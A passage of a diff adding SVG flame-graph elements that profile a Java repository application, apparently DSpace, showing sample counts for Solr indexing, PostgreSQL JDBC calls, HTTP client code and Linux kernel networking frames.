+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="543.0" y="805" width="3.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="546.04" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrInputDocument:::addField (1 samples, 0.09%)</title><rect x="575.3" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="578.28" y="959.5" ></text>
+</g>
+<g >
+<title>swapgs_restore_regs_and_return_to_usermode (1 samples, 0.09%)</title><rect x="696.7" y="853" width="1.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="699.72" y="863.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.09%)</title><rect x="799.9" y="933" width="1.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="802.89" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (2 samples, 0.18%)</title><rect x="833.2" y="885" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="836.21" y="895.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.09%)</title><rect x="1043.8" y="965" width="1.1" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="1046.84" y="975.5" ></text>
+</g>
+<g >
+<title>schedule (5 samples, 0.46%)</title><rect x="548.4" y="693" width="5.4" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="551.42" y="703.5" ></text>
+</g>
+<g >
+<title>irq_exit (1 samples, 0.09%)</title><rect x="735.4" y="693" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="738.41" y="703.5" ></text>
+</g>
+<g >
+<title>_raw_spin_lock (1 samples, 0.09%)</title><rect x="251.8" y="645" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="254.80" y="655.5" ></text>
+</g>
+<g >
+<title>nvme_irq (1 samples, 0.09%)</title><rect x="137.9" y="1109" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="140.89" y="1119.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::info (8 samples, 0.73%)</title><rect x="1133.0" y="997" width="8.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1136.04" y="1007.5" ></text>
+</g>
+<g >
+<title>JVM_FillInStackTrace (7 samples, 0.64%)</title><rect x="1101.9" y="709" width="7.5" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="1104.88" y="719.5" ></text>
+</g>
+<g >
+<title>pollwake (1 samples, 0.09%)</title><rect x="274.4" y="693" width="1.0" height="15.0" fill="rgb(249,122,122)" rx="2" ry="2" />
+<text  x="277.37" y="703.5" ></text>
+</g>
+<g >
+<title>__kmalloc_node_track_caller (3 samples, 0.27%)</title><rect x="175.5" y="1125" width="3.2" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="178.50" y="1135.5" ></text>
+</g>
+<g >
+<title>__pthread_mutex_lock (1 samples, 0.09%)</title><rect x="860.1" y="741" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="863.07" y="751.5" ></text>
+</g>
+<g >
+<title>ip_protocol_deliver_rcu (51 samples, 4.64%)</title><rect x="236.8" y="805" width="54.8" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="239.76" y="815.5" >ip_pr..</text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doReceiveResponse (1 samples, 0.09%)</title><rect x="539.8" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="542.82" y="879.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (5 samples, 0.46%)</title><rect x="646.2" y="821" width="5.4" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="649.21" y="831.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::equals (2 samples, 0.18%)</title><rect x="607.5" y="949" width="2.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="610.52" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::getTotalLength (1 samples, 0.09%)</title><rect x="463.5" y="853" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="466.52" y="863.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.18%)</title><rect x="461.4" y="885" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="464.37" y="895.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (4 samples, 0.36%)</title><rect x="820.3" y="837" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.31" y="847.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (6 samples, 0.55%)</title><rect x="547.3" y="789" width="6.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="550.34" y="799.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (7 samples, 0.64%)</title><rect x="1021.3" y="869" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1024.28" y="879.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (61 samples, 5.56%)</title><rect x="13.2" y="1205" width="65.6" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="16.22" y="1215.5" >futex_w..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::setInt (1 samples, 0.09%)</title><rect x="1029.9" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1032.87" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/Context:::fromCache (1 samples, 0.09%)</title><rect x="1142.7" y="981" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1145.71" y="991.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (4 samples, 0.36%)</title><rect x="740.8" y="917" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="927.5" ></text>
+</g>
+<g >
+<title>update_blocked_averages (1 samples, 0.09%)</title><rect x="220.6" y="901" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="223.64" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="834.3" y="805" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="837.28" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/RequestTargetHost:::process (1 samples, 0.09%)</title><rect x="1115.8" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1118.85" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::getColumnNames (1 samples, 0.09%)</title><rect x="738.6" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="741.63" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/SolrInputDocument:::getFieldValues (1 samples, 0.09%)</title><rect x="561.3" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="564.31" y="959.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%)</title><rect x="740.8" y="789" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="799.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (2 samples, 0.18%)</title><rect x="735.4" y="805" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="738.41" y="815.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (3 samples, 0.27%)</title><rect x="917.0" y="661" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="671.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/utils/URLEncodedUtils:::parse (1 samples, 0.09%)</title><rect x="1077.2" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1080.16" y="927.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (3 samples, 0.27%)</title><rect x="812.8" y="805" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="815.79" y="815.5" ></text>
+</g>
+<g >
+<title>inet_stream_connect (1 samples, 0.09%)</title><rect x="1078.2" y="677" width="1.1" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="1081.23" y="687.5" ></text>
+</g>
+<g >
+<title>org/apache/http/message/BasicHeaderValueParser:::parseNameValuePair (1 samples, 0.09%)</title><rect x="1123.4" y="949" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1126.37" y="959.5" ></text>
+</g>
+<g >
+<title>ipt_do_table (2 samples, 0.18%)</title><rect x="209.9" y="1013" width="2.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="212.89" y="1023.5" ></text>
+</g>
+<g >
+<title>java/io/BufferedReader:::readLine (1 samples, 0.09%)</title><rect x="413.0" y="821" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="416.01" y="831.5" ></text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.09%)</title><rect x="177.7" y="1045" width="1.0" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="180.65" y="1055.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/params/ModifiableSolrParams:::set (1 samples, 0.09%)</title><rect x="1127.7" y="981" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1130.67" y="991.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::findByUnique (17 samples, 1.55%)</title><rect x="845.0" y="917" width="18.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="848.03" y="927.5" ></text>
+</g>
+<g >
+<title>jshort_disjoint_arraycopy (2 samples, 0.18%)</title><rect x="591.4" y="965" width="2.2" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="594.40" y="975.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::getBytes (4 samples, 0.36%)</title><rect x="403.3" y="917" width="4.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="406.33" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Item:::getBundles (38 samples, 3.46%)</title><rect x="799.9" y="965" width="40.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="802.89" y="975.5" >org..</text>
+</g>
+<g >
+<title>refcount_dec_and_test_checked (2 samples, 0.18%)</title><rect x="92.8" y="1157" width="2.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="95.75" y="1167.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::getIntColumn (1 samples, 0.09%)</title><rect x="620.4" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="623.42" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/ClientParamsStack:::getParameter (1 samples, 0.09%)</title><rect x="1073.9" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1076.93" y="927.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="462.4" y="805" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="465.44" y="815.5" ></text>
+</g>
+<g >
+<title>call_stub (11 samples, 1.00%)</title><rect x="651.6" y="821" width="11.8" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="654.58" y="831.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (3 samples, 0.27%)</title><rect x="917.0" y="677" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="687.5" ></text>
+</g>
+<g >
+<title>_raw_spin_lock_irqsave (1 samples, 0.09%)</title><rect x="252.9" y="629" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="255.88" y="639.5" ></text>
+</g>
+<g >
+<title>jbyte_disjoint_arraycopy (1 samples, 0.09%)</title><rect x="431.3" y="821" width="1.0" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="434.28" y="831.5" ></text>
+</g>
+<g >
+<title>syscall_return_via_sysret (1 samples, 0.09%)</title><rect x="370.0" y="1301" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="373.02" y="1311.5" ></text>
+</g>
+<g >
+<title>tcp_rearm_rto (1 samples, 0.09%)</title><rect x="356.0" y="1109" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="359.05" y="1119.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/HttpStrictMultipart:::formatMultipartHeader (19 samples, 1.73%)</title><rect x="427.0" y="837" width="20.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="429.98" y="847.5" ></text>
+</g>
+<g >
+<title>[libjli.so] (747 samples, 68.03%)</title><rect x="372.2" y="1301" width="802.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="375.17" y="1311.5" >[libjli.so]</text>
+</g>
+<g >
+<title>handle_irq_event (1 samples, 0.09%)</title><rect x="790.2" y="741" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="793.22" y="751.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="544.1" y="629" width="2.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="547.12" y="639.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedConstructorAccessor22:::newInstance (28 samples, 2.55%)</title><rect x="903.1" y="869" width="30.1" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="906.06" y="879.5" >su..</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="421.6" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="847.5" ></text>
+</g>
+<g >
+<title>__generic_file_write_iter (2 samples, 0.18%)</title><rect x="409.8" y="629" width="2.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="412.78" y="639.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::executeQuery (4 samples, 0.36%)</title><rect x="1167.4" y="965" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1170.43" y="975.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (3 samples, 0.27%)</title><rect x="1109.4" y="837" width="3.2" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="1112.40" y="847.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/protocol/RequestTargetAuthentication:::process (1 samples, 0.09%)</title><rect x="557.0" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="560.01" y="879.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (1 samples, 0.09%)</title><rect x="827.8" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="830.83" y="895.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb_one_core (91 samples, 8.29%)</title><rect x="233.5" y="885" width="97.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="236.53" y="895.5" >__netif_rec..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.09%)</title><rect x="790.2" y="805" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="793.22" y="815.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (3 samples, 0.27%)</title><rect x="917.0" y="709" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="719.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group:::find (1 samples, 0.09%)</title><rect x="755.8" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="758.83" y="959.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (4 samples, 0.36%)</title><rect x="811.7" y="821" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="814.71" y="831.5" ></text>
+</g>
+<g >
+<title>java/lang/Integer:::toString (1 samples, 0.09%)</title><rect x="1130.9" y="997" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1133.89" y="1007.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceSpellIndexingPlugin:::additionalIndex (3 samples, 0.27%)</title><rect x="889.1" y="965" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="892.09" y="975.5" ></text>
+</g>
+<g >
+<title>java/lang/StringCoding:::decode (1 samples, 0.09%)</title><rect x="1150.2" y="901" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1153.24" y="911.5" ></text>
+</g>
+<g >
+<title>exit_to_usermode_loop (1 samples, 0.09%)</title><rect x="366.8" y="1269" width="1.1" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="369.79" y="1279.5" ></text>
+</g>
+<g >
+<title>ret_from_intr (1 samples, 0.09%)</title><rect x="631.2" y="853" width="1.0" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="634.17" y="863.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.18%)</title><rect x="783.8" y="885" width="2.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="786.77" y="895.5" ></text>
+</g>
+<g >
+<title>ipt_do_table (1 samples, 0.09%)</title><rect x="293.7" y="789" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="296.72" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (6 samples, 0.55%)</title><rect x="1034.2" y="949" width="6.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1037.17" y="959.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::get (1 samples, 0.09%)</title><rect x="694.6" y="869" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="697.57" y="879.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1078.2" y="837" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="847.5" ></text>
+</g>
+<g >
+<title>read_tsc (1 samples, 0.09%)</title><rect x="288.3" y="725" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="291.34" y="735.5" ></text>
+</g>
+<g >
+<title>tcp_rbtree_insert (1 samples, 0.09%)</title><rect x="355.0" y="1109" width="1.0" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="357.97" y="1119.5" ></text>
+</g>
+<g >
+<title>nvme_pci_complete_rq (1 samples, 0.09%)</title><rect x="137.9" y="1077" width="1.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="140.89" y="1087.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::SendInteger4 (1 samples, 0.09%)</title><rect x="1167.4" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1170.43" y="943.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::queryTable (5 samples, 0.46%)</title><rect x="758.0" y="949" width="5.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="760.98" y="959.5" ></text>
+</g>
+<g >
+<title>crypt_dec_pending (1 samples, 0.09%)</title><rect x="137.9" y="981" width="1.1" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="140.89" y="991.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (2 samples, 0.18%)</title><rect x="741.9" y="789" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="744.86" y="799.5" ></text>
+</g>
+<g >
+<title>__softirqentry_text_start (1 samples, 0.09%)</title><rect x="1078.2" y="421" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="1081.23" y="431.5" ></text>
+</g>
+<g >
+<title>java/lang/Class:::getDeclaringClass0 (1 samples, 0.09%)</title><rect x="631.2" y="885" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="634.17" y="895.5" ></text>
+</g>
+<g >
+<title>schedule (1 samples, 0.09%)</title><rect x="366.8" y="1253" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="369.79" y="1263.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (13 samples, 1.18%)</title><rect x="540.9" y="885" width="14.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="543.89" y="895.5" ></text>
+</g>
+<g >
+<title>Interpreter (1 samples, 0.09%)</title><rect x="1121.2" y="917" width="1.1" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="1124.22" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/XML:::escape (32 samples, 2.91%)</title><rect x="489.3" y="837" width="34.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="492.31" y="847.5" >or..</text>
+</g>
+<g >
+<title>skb_page_frag_refill (1 samples, 0.09%)</title><rect x="173.4" y="1157" width="1.0" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="176.35" y="1167.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::put (3 samples, 0.27%)</title><rect x="622.6" y="901" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="625.57" y="911.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.09%)</title><rect x="883.7" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="886.72" y="959.5" ></text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (60 samples, 5.46%)</title><rect x="13.2" y="1125" width="64.5" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="16.22" y="1135.5" >perf_pm..</text>
+</g>
+<g >
+<title>ip_rcv_finish (62 samples, 5.65%)</title><rect x="236.8" y="853" width="66.6" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="239.76" y="863.5" >ip_rcv_..</text>
+</g>
+<g >
+<title>finish_task_switch (5 samples, 0.46%)</title><rect x="548.4" y="661" width="5.4" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="551.42" y="671.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/pool/impl/GenericKeyedObjectPool:::borrowObject (1 samples, 0.09%)</title><rect x="791.3" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="794.29" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingConnection$PStmtKey:::hashCode (1 samples, 0.09%)</title><rect x="861.1" y="853" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="864.15" y="863.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (4 samples, 0.36%)</title><rect x="806.3" y="901" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="809.34" y="911.5" ></text>
+</g>
+<g >
+<title>update_blocked_averages (1 samples, 0.09%)</title><rect x="735.4" y="645" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="738.41" y="655.5" ></text>
+</g>
+<g >
+<title>nf_conntrack_in (1 samples, 0.09%)</title><rect x="1078.2" y="69" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="1081.23" y="79.5" ></text>
+</g>
+<g >
+<title>release_sock (2 samples, 0.18%)</title><rect x="96.0" y="1189" width="2.1" height="15.0" fill="rgb(244,115,115)" rx="2" ry="2" />
+<text  x="98.97" y="1199.5" ></text>
+</g>
+<g >
+<title>acpi_ev_detect_gpe (1 samples, 0.09%)</title><rect x="421.6" y="565" width="1.1" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="424.60" y="575.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/util/ClientUtils:::writeVal (38 samples, 3.46%)</title><rect x="482.9" y="853" width="40.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="485.86" y="863.5" >org..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::execute (1 samples, 0.09%)</title><rect x="873.0" y="821" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="831.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match0 (4 samples, 0.36%)</title><rect x="916.0" y="789" width="4.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="918.96" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getLong (1 samples, 0.09%)</title><rect x="828.9" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="831.91" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingStatement:::close (2 samples, 0.18%)</title><rect x="764.4" y="933" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="767.43" y="943.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/PatternParser$DatePatternConverter:::convert (1 samples, 0.09%)</title><rect x="1140.6" y="917" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1143.56" y="927.5" ></text>
+</g>
+<g >
+<title>Java_java_lang_Throwable_fillInStackTrace (7 samples, 0.64%)</title><rect x="1101.9" y="725" width="7.5" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1104.88" y="735.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getBitstreamsInternal (26 samples, 2.37%)</title><rect x="801.0" y="949" width="27.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="803.97" y="959.5" >o..</text>
+</g>
+<g >
+<title>[libjvm.so] (747 samples, 68.03%)</title><rect x="372.2" y="1077" width="802.8" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="375.17" y="1087.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolingConnection$PStmtKey:::hashCode (1 samples, 0.09%)</title><rect x="1153.5" y="901" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1156.46" y="911.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (1 samples, 0.09%)</title><rect x="568.8" y="933" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="571.83" y="943.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (1 samples, 0.09%)</title><rect x="1078.2" y="741" width="1.1" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="1081.23" y="751.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.09%)</title><rect x="873.0" y="853" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="863.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (2 samples, 0.18%)</title><rect x="749.4" y="885" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="752.38" y="895.5" ></text>
+</g>
+<g >
+<title>tcp_clean_rtx_queue (4 samples, 0.36%)</title><rect x="283.0" y="725" width="4.3" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="285.97" y="735.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%)</title><rect x="850.4" y="869" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="853.40" y="879.5" ></text>
+</g>
+<g >
